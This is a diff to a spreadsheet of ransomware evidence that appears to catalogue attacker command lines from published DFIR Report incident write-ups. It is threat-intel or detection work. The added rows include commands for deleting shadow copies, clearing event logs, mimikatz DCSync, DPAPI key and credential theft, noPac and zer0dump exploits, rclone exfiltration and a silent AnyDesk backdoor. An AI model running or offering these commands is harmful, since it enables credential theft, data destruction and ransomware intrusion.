--- a/delta2/lib_evidence/eid-ransom.xlsx
+++ b/delta2/lib_evidence/eid-ransom.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_evidence/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{6FED219A-1623-F545-9177-18884D716A39}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D01B8B9F-B04D-2443-A6D9-DBBE91F7025D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="100" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
   </bookViews>
@@ -27,10 +27,10 @@
   </sheets>
   <calcPr calcId="191029"/>
   <pivotCaches>
-    <pivotCache cacheId="232" r:id="rId12"/>
-    <pivotCache cacheId="233" r:id="rId13"/>
-    <pivotCache cacheId="234" r:id="rId14"/>
-    <pivotCache cacheId="235" r:id="rId15"/>
+    <pivotCache cacheId="240" r:id="rId12"/>
+    <pivotCache cacheId="241" r:id="rId13"/>
+    <pivotCache cacheId="242" r:id="rId14"/>
+    <pivotCache cacheId="243" r:id="rId15"/>
   </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
@@ -52,7 +52,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7988" uniqueCount="3333">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8357" uniqueCount="3506">
   <si>
     <t>delta_pid</t>
   </si>
@@ -10123,6 +10123,527 @@
   </si>
   <si>
     <t>ransom-eid1433</t>
+  </si>
+  <si>
+    <t>{"date": "2025-06", "url": "https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/", "tags": ["RansomHub"]}</t>
+  </si>
+  <si>
+    <t>powershell.exe -Command PowerShell -Command "{ Get-VM | where { $_.Name -ne 'VM01' -and $_.Name -ne 'VM02' } | Stop-VM -Force</t>
+  </si>
+  <si>
+    <t>powershell.exe -Command PowerShell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""</t>
+  </si>
+  <si>
+    <t>cmd.exe /c ""vssadmin.exe Delete Shadows /all /quiet""</t>
+  </si>
+  <si>
+    <t>cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2L:1""</t>
+  </si>
+  <si>
+    <t>cmd.exe /c ""fsutil behavior set SymlinkEvaluation R2R:1""</t>
+  </si>
+  <si>
+    <t>cmd.exe /c wevtutil cl security</t>
+  </si>
+  <si>
+    <t>cmd.exe /c wevtutil cl system</t>
+  </si>
+  <si>
+    <t>cmd.exe /c wevtutil cl application</t>
+  </si>
+  <si>
+    <t>"C:\Users\Uname\Desktop\x64\credentialsfileview-x64\CredntialsFileView.exe</t>
+  </si>
+  <si>
+    <t>ransom-eid1434</t>
+  </si>
+  <si>
+    <t>ransom-eid1435</t>
+  </si>
+  <si>
+    <t>ransom-eid1436</t>
+  </si>
+  <si>
+    <t>ransom-eid1437</t>
+  </si>
+  <si>
+    <t>ransom-eid1438</t>
+  </si>
+  <si>
+    <t>ransom-eid1439</t>
+  </si>
+  <si>
+    <t>ransom-eid1440</t>
+  </si>
+  <si>
+    <t>ransom-eid1441</t>
+  </si>
+  <si>
+    <t>ransom-eid1442</t>
+  </si>
+  <si>
+    <t>DCSync -4662</t>
+  </si>
+  <si>
+    <t>lsadump::dcsync /domain:CHILD.DOMAIN.EXAMPLE /user:DOMAINADMINUSER /csv &gt; CHILD.csv</t>
+  </si>
+  <si>
+    <t>net group "server_admins" /domain</t>
+  </si>
+  <si>
+    <t>net group "domain computers" /domain</t>
+  </si>
+  <si>
+    <t>net accounts</t>
+  </si>
+  <si>
+    <t>route print</t>
+  </si>
+  <si>
+    <t>ping &lt;host&gt;</t>
+  </si>
+  <si>
+    <t>ransom-eid1443</t>
+  </si>
+  <si>
+    <t>ransom-eid1444</t>
+  </si>
+  <si>
+    <t>ransom-eid1445</t>
+  </si>
+  <si>
+    <t>ransom-eid1446</t>
+  </si>
+  <si>
+    <t>ransom-eid1447</t>
+  </si>
+  <si>
+    <t>ransom-eid1448</t>
+  </si>
+  <si>
+    <t>ransom-eid1449</t>
+  </si>
+  <si>
+    <t>ransom-eid1450</t>
+  </si>
+  <si>
+    <t>ransom-eid1451</t>
+  </si>
+  <si>
+    <t>ransom-eid1452</t>
+  </si>
+  <si>
+    <t>ransom-eid1453</t>
+  </si>
+  <si>
+    <t>ransom-eid1454</t>
+  </si>
+  <si>
+    <t>"C:&lt;redacted&gt;\A[[Data\Local\Temp\4\Advanced IP Scanner 2\advanced_ip_scanner.exe" /portable "C:&lt;redacted&gt;\Downloads" /lng en_us</t>
+  </si>
+  <si>
+    <t>ransom-eid1455</t>
+  </si>
+  <si>
+    <t>C:\Windows\delete.me</t>
+  </si>
+  <si>
+    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dnsmgmt.msc</t>
+  </si>
+  <si>
+    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dsa.msc</t>
+  </si>
+  <si>
+    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\dssite.msc</t>
+  </si>
+  <si>
+    <t>C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding</t>
+  </si>
+  <si>
+    <t>ransom-eid1456</t>
+  </si>
+  <si>
+    <t>ransom-eid1457</t>
+  </si>
+  <si>
+    <t>ransom-eid1458</t>
+  </si>
+  <si>
+    <t>"C:\Windows\System32\mmc.exe" c:\Windows\system32\domain.msc</t>
+  </si>
+  <si>
+    <t>ransom-eid1459</t>
+  </si>
+  <si>
+    <t>hkey_local_machine\\software\\policies\\microsoft\\windows nt\\terminal services\\fdenytsconnections</t>
+  </si>
+  <si>
+    <t>Set WshShell = CreateObject("WScript.Shell")
+WshShell.Run chr(34) &amp; "C:\ProgramData\Veeam\rcl.bat" &amp; Chr(34), 0
+Set WshShell = Nothing</t>
+  </si>
+  <si>
+    <t>rclone copy [REDACTED]:/mnt/sdd/REDACTED --include-from include.txt</t>
+  </si>
+  <si>
+    <t>aipscanner</t>
+  </si>
+  <si>
+    <t>ransom-eid1460</t>
+  </si>
+  <si>
+    <t>ransom-eid1461</t>
+  </si>
+  <si>
+    <t>ransom-eid1462</t>
+  </si>
+  <si>
+    <t>ransom-eid1463</t>
+  </si>
+  <si>
+    <t>{"date": "2025-04", "url": "https://thedfirreport.com/2025/04/28/navigating-through-the-fog/", "tags": ["Fog"]}</t>
+  </si>
+  <si>
+    <t>proxychains dpapi.py backupkeys -t fourlis.net/&lt;redacted&gt; --export</t>
+  </si>
+  <si>
+    <t>proxychains dpapi.py backupkeys -t -hashes fourlis.net/&lt;redacted&gt; --export</t>
+  </si>
+  <si>
+    <t>netextender &lt;target IP address&gt; –username &lt;target username&gt; –password &lt;username password&gt; –domain &lt;target domain name&gt; –always-trust</t>
+  </si>
+  <si>
+    <t>NetExec</t>
+  </si>
+  <si>
+    <t>pipx install git+https://github.com/Pennyw0rth/NetExec</t>
+  </si>
+  <si>
+    <t>netexec</t>
+  </si>
+  <si>
+    <t>pipx upgrade netexec</t>
+  </si>
+  <si>
+    <t>proxychains nxc smb &lt;ipaddress&gt;</t>
+  </si>
+  <si>
+    <t>proxychains nxc smb &lt;ipaddress&gt; -u &lt;redact&gt; -p &lt;redact&gt;</t>
+  </si>
+  <si>
+    <t>ransom-eid1464</t>
+  </si>
+  <si>
+    <t>ransom-eid1465</t>
+  </si>
+  <si>
+    <t>ransom-eid1466</t>
+  </si>
+  <si>
+    <t>ransom-eid1467</t>
+  </si>
+  <si>
+    <t>ransom-eid1468</t>
+  </si>
+  <si>
+    <t>ransom-eid1469</t>
+  </si>
+  <si>
+    <t>ransom-eid1470</t>
+  </si>
+  <si>
+    <t>ransom-eid1471</t>
+  </si>
+  <si>
+    <t>netextender</t>
+  </si>
+  <si>
+    <t>powershell -command "(new-object System.Net.WebClient).DownloadFile('http://download.anydesk.com/AnyDesk.exe', 'C:\ProgramData\AnyDesk.exe')"</t>
+  </si>
+  <si>
+    <t>pshell, anydesk</t>
+  </si>
+  <si>
+    <t>cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent</t>
+  </si>
+  <si>
+    <t>cmd.exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password</t>
+  </si>
+  <si>
+    <t>cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id</t>
+  </si>
+  <si>
+    <t>ransom-eid1472</t>
+  </si>
+  <si>
+    <t>ransom-eid1473</t>
+  </si>
+  <si>
+    <t>ransom-eid1474</t>
+  </si>
+  <si>
+    <t>ransom-eid1475</t>
+  </si>
+  <si>
+    <t>proxychains python DonPAPI.py -pvk &lt;redact&gt;@ip.txt --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o</t>
+  </si>
+  <si>
+    <t>proxychains python3 DonPAPI.py -pvk &lt;redact&gt;@ip.txt --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o</t>
+  </si>
+  <si>
+    <t>sudo git clone https://github.com/SecurAuthCorp/impacket.git /opt/impacket</t>
+  </si>
+  <si>
+    <t>sudo pip3 install -r /opt/impacket/requirements.txt</t>
+  </si>
+  <si>
+    <t>cd /opt/impacket/</t>
+  </si>
+  <si>
+    <t>proxychains impacket-dpapi backupkeys -t &lt;redacted&gt; --export</t>
+  </si>
+  <si>
+    <t>impacket-dpapy</t>
+  </si>
+  <si>
+    <t>impacket-dpapi</t>
+  </si>
+  <si>
+    <t>proxychains dpapi.py backupkeys -t &lt;redacted&gt;@10.1.45.2 --export</t>
+  </si>
+  <si>
+    <t>proxychains dpapi.py backupkeys -t -hashes &lt;redacted&gt;@10.0.16.40 --export</t>
+  </si>
+  <si>
+    <t>proxychains dpapi.py backupkeys  -hashes &lt;redacted&gt;@10.0.3.10 --export</t>
+  </si>
+  <si>
+    <t>ransom-eid1476</t>
+  </si>
+  <si>
+    <t>ransom-eid1477</t>
+  </si>
+  <si>
+    <t>ransom-eid1478</t>
+  </si>
+  <si>
+    <t>ransom-eid1479</t>
+  </si>
+  <si>
+    <t>ransom-eid1480</t>
+  </si>
+  <si>
+    <t>ransom-eid1481</t>
+  </si>
+  <si>
+    <t>ransom-eid1482</t>
+  </si>
+  <si>
+    <t>ransom-eid1483</t>
+  </si>
+  <si>
+    <t>ransom-eid1484</t>
+  </si>
+  <si>
+    <t>ransom-eid1485</t>
+  </si>
+  <si>
+    <t>ransom-eid1486</t>
+  </si>
+  <si>
+    <t>dpapi.py -h</t>
+  </si>
+  <si>
+    <t>dpapi.py --help</t>
+  </si>
+  <si>
+    <t>ransom-eid1487</t>
+  </si>
+  <si>
+    <t>ransom-eid1488</t>
+  </si>
+  <si>
+    <t>certipy</t>
+  </si>
+  <si>
+    <t>proxychains cd certipy</t>
+  </si>
+  <si>
+    <t>cd certipy</t>
+  </si>
+  <si>
+    <t>proxychains certipy find -u &lt;redacted&gt; -p &lt;redacted&gt; -dc-ip &lt;ipaddress&gt; -scheme ldap</t>
+  </si>
+  <si>
+    <t>git clone https://github.com/ly4k/Certipy</t>
+  </si>
+  <si>
+    <t>cd Certipy</t>
+  </si>
+  <si>
+    <t>ransom-eid1489</t>
+  </si>
+  <si>
+    <t>ransom-eid1490</t>
+  </si>
+  <si>
+    <t>ransom-eid1491</t>
+  </si>
+  <si>
+    <t>ransom-eid1492</t>
+  </si>
+  <si>
+    <t>ransom-eid1493</t>
+  </si>
+  <si>
+    <t>ransom-eid1494</t>
+  </si>
+  <si>
+    <t>ransom-eid1495</t>
+  </si>
+  <si>
+    <t>ransom-eid1496</t>
+  </si>
+  <si>
+    <t>ransom-eid1497</t>
+  </si>
+  <si>
+    <t>git clone https://github.com/trustedsec/orpheus</t>
+  </si>
+  <si>
+    <t>cd orpheus</t>
+  </si>
+  <si>
+    <t>ransom-eid1498</t>
+  </si>
+  <si>
+    <t>ransom-eid1499</t>
+  </si>
+  <si>
+    <t>orpheus</t>
+  </si>
+  <si>
+    <t>gitclone https://github.com/bb00/zer0dump.git</t>
+  </si>
+  <si>
+    <t>proxychains gitclone https://github.com/bb00/zer0dump.git</t>
+  </si>
+  <si>
+    <t>git clone https://github.com/bb00/zer0dump.git</t>
+  </si>
+  <si>
+    <t>cd zer0dump</t>
+  </si>
+  <si>
+    <t>proxychains python3 zer0dump.py</t>
+  </si>
+  <si>
+    <t>ransom-eid1500</t>
+  </si>
+  <si>
+    <t>ransom-eid1501</t>
+  </si>
+  <si>
+    <t>ransom-eid1502</t>
+  </si>
+  <si>
+    <t>ransom-eid1503</t>
+  </si>
+  <si>
+    <t>ransom-eid1504</t>
+  </si>
+  <si>
+    <t>zer0dump</t>
+  </si>
+  <si>
+    <t>git clone https://github.com/ly4k/Pachine</t>
+  </si>
+  <si>
+    <t>cd Pachine</t>
+  </si>
+  <si>
+    <t>proxychains python3 pachine.py -dc-host</t>
+  </si>
+  <si>
+    <t>pachine</t>
+  </si>
+  <si>
+    <t>ransom-eid1505</t>
+  </si>
+  <si>
+    <t>ransom-eid1506</t>
+  </si>
+  <si>
+    <t>ransom-eid1507</t>
+  </si>
+  <si>
+    <t>noPac</t>
+  </si>
+  <si>
+    <t>proxychains python3 noPac.py &lt;redacted&gt; -dc-ip &lt;ipaddress&gt; -dc-host &lt;redact&gt; -shell --impersonate administrator</t>
+  </si>
+  <si>
+    <t>nopac</t>
+  </si>
+  <si>
+    <t>ransom-eid1508</t>
+  </si>
+  <si>
+    <t>ransom-eid1509</t>
+  </si>
+  <si>
+    <t>git clone https://github.com/Ridter/noPac</t>
+  </si>
+  <si>
+    <t>cd noPac/</t>
+  </si>
+  <si>
+    <t>python3 noPac.py</t>
+  </si>
+  <si>
+    <t>proxychains</t>
+  </si>
+  <si>
+    <t>sudo apt install proxychains</t>
+  </si>
+  <si>
+    <t>sudo nano /etc/proxychains.conf</t>
+  </si>
+  <si>
+    <t>proxychains scanner.py -dc-ip &lt;ip&gt; &lt;redacted&gt; -use-ldap</t>
+  </si>
+  <si>
+    <t>pyscanner</t>
+  </si>
+  <si>
+    <t>ransom-eid1510</t>
+  </si>
+  <si>
+    <t>ransom-eid1511</t>
+  </si>
+  <si>
+    <t>ransom-eid1512</t>
+  </si>
+  <si>
+    <t>ransom-eid1513</t>
+  </si>
+  <si>
+    <t>ransom-eid1514</t>
+  </si>
+  <si>
+    <t>ransom-eid1515</t>
+  </si>
+  <si>
+    <t>ransom-eid1516</t>
+  </si>
+  <si>
+    <t>ransom-eid1517</t>
+  </si>
+  <si>
+    <t>proxychains python3 pachine.py -dc-host &lt;redacted&gt; -scan</t>
+  </si>
+  <si>
+    <t>Powercat</t>
   </si>
 </sst>
 </file>
@@ -10327,6 +10848,29 @@
       <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
     <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <fill>
+        <patternFill patternType="solid">
+          <fgColor indexed="64"/>
+          <bgColor rgb="FF00B0F0"/>
+        </patternFill>
+      </fill>
+    </dxf>
+    <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
+    <dxf>
       <fill>
         <patternFill patternType="solid">
           <fgColor indexed="64"/>
@@ -10387,29 +10931,6 @@
         <patternFill patternType="solid">
           <fgColor indexed="64"/>
           <bgColor theme="3" tint="0.499984740745262"/>
-        </patternFill>
-      </fill>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
-    </dxf>
-    <dxf>
-      <fill>
-        <patternFill patternType="solid">
-          <fgColor indexed="64"/>
-          <bgColor rgb="FF00B0F0"/>
         </patternFill>
       </fill>
     </dxf>
@@ -34995,7 +35516,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{CD651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="232" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{CD651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="240" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C40" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="12">
     <pivotField dataField="1" showAll="0"/>
@@ -35261,7 +35782,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable2.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{4823DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="233" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{4823DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="241" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C13" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="11">
     <pivotField dataField="1" showAll="0"/>
@@ -35362,7 +35883,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable3.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{521E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="234" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{521E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="242" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C20" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="10">
     <pivotField dataField="1" showAll="0"/>
@@ -35496,7 +36017,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable4.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{672A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="235" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{672A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="243" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C40" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="8">
     <pivotField dataField="1" showAll="0"/>
@@ -35732,31 +36253,31 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:L1433" totalsRowShown="0" headerRowDxfId="23">
-  <autoFilter ref="A1:L1433" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:L1517" totalsRowShown="0" headerRowDxfId="8">
+  <autoFilter ref="A1:L1517" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
   <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L1390">
     <sortCondition ref="A1:A1390"/>
   </sortState>
   <tableColumns count="12">
     <tableColumn id="1" xr3:uid="{23FD2D36-2698-2541-9FC1-93976DA52D32}" name="delta_eid"/>
     <tableColumn id="5" xr3:uid="{A6AFA2D3-A50F-2F4E-9A4A-D6153D42841B}" name="delta_pid"/>
-    <tableColumn id="15" xr3:uid="{247E4813-26D9-A443-B5DA-8FC7A1D2F8C4}" name="description" dataDxfId="22"/>
-    <tableColumn id="6" xr3:uid="{CF28C46E-02F7-6C46-AFC2-39368AC338E7}" name="process_cmdline" dataDxfId="21"/>
-    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="20"/>
+    <tableColumn id="15" xr3:uid="{247E4813-26D9-A443-B5DA-8FC7A1D2F8C4}" name="description" dataDxfId="7"/>
+    <tableColumn id="6" xr3:uid="{CF28C46E-02F7-6C46-AFC2-39368AC338E7}" name="process_cmdline" dataDxfId="6"/>
+    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="5"/>
     <tableColumn id="8" xr3:uid="{B54F79EF-DF49-304C-B68A-284009C06F8F}" name="process_name"/>
     <tableColumn id="9" xr3:uid="{77731B4F-413A-9A48-9E34-761BA28F57CC}" name="initiating_process_name"/>
     <tableColumn id="10" xr3:uid="{D14102FB-89EB-6E41-B3EA-523646DB8A53}" name="process_path"/>
-    <tableColumn id="11" xr3:uid="{D06C5568-EEDD-0B40-B52A-8462826FD229}" name="initiating_process_path" dataDxfId="19"/>
+    <tableColumn id="11" xr3:uid="{D06C5568-EEDD-0B40-B52A-8462826FD229}" name="initiating_process_path" dataDxfId="4"/>
     <tableColumn id="12" xr3:uid="{B696AE98-F833-4348-8A2A-083681C93892}" name="process_account"/>
     <tableColumn id="13" xr3:uid="{DEC979B5-A396-F945-A221-01278C4EA968}" name="object"/>
-    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="18"/>
+    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="3"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="3" xr:uid="{B691767E-9B37-6F40-A879-7D79A46E2FC0}" name="Table3" displayName="Table3" ref="A1:K23" totalsRowShown="0" headerRowDxfId="17">
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="3" xr:uid="{B691767E-9B37-6F40-A879-7D79A46E2FC0}" name="Table3" displayName="Table3" ref="A1:K23" totalsRowShown="0" headerRowDxfId="23">
   <autoFilter ref="A1:K23" xr:uid="{B691767E-9B37-6F40-A879-7D79A46E2FC0}"/>
   <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:K21">
     <sortCondition ref="A1:A21"/>
@@ -35766,11 +36287,11 @@
